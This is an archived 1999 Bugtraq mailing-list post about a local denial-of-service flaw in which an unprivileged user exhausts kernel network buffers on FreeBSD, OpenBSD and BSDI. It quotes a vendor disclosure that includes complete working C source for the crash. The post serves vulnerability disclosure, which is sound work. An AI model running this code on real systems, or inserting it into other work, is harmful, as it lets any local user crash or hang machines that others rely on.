Bugtraq mailing list archives
Re: Local DoS on network by unpriviledged user using setsockopt()
From: dvorak () CAPU NET (John N Dvorak)
Date: Fri, 3 Sep 1999 09:47:18 -0400
Just verified all versions of BSDI in my possession (2.1, 3.1, 4.0, 4.01) are vulnerable. I do not have all the details, but the kernel panics. System eventually reboots in 2.1. Can be executed by any non-privileged user.

JD

On Wed, 1 Sep 1999, Sven Berkvens wrote:
Recently, I mailed this mailing to a number of people who are concerned with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The mailing was NOT intended to be made public, but somehow it was. Here is my original mailing:

--- Forwarded ---

I stumbled across a denial of service attack on FreeBSD systems, where an unprivileged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions.

OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD.

As far as I'm concerned, this can be handled quietly and without much haste. Knowledge of this problem is limited and there is absolutely no intention of publishing this exploit or messages to Bugtraq.

With kind regards,

Sven Berkvens (sven () ilse nl)
Long time FreeBSD-system administrator

The source code for the program that causes this:

#include <stdlib.h>	/* for exit() */
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

extern int
main(void)
{
	int p[2], i;
	char crap[BUFFERSIZE];

	while (1)
	{
		if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
			break;
		i = BUFFERSIZE;
		setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
		setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
		fcntl(p[0], F_SETFL, O_NONBLOCK);
		fcntl(p[1], F_SETFL, O_NONBLOCK);
		write(p[0], crap, BUFFERSIZE);
		write(p[1], crap, BUFFERSIZE);
	}
	exit(0);
}

----- End forwarded message -----
===========================================
John N Dvorak | dvorak () capu net
Director of Technology
CapuNet, LLC - Corporate Internet Solutions
(301) 881-4900 x8018
===========================================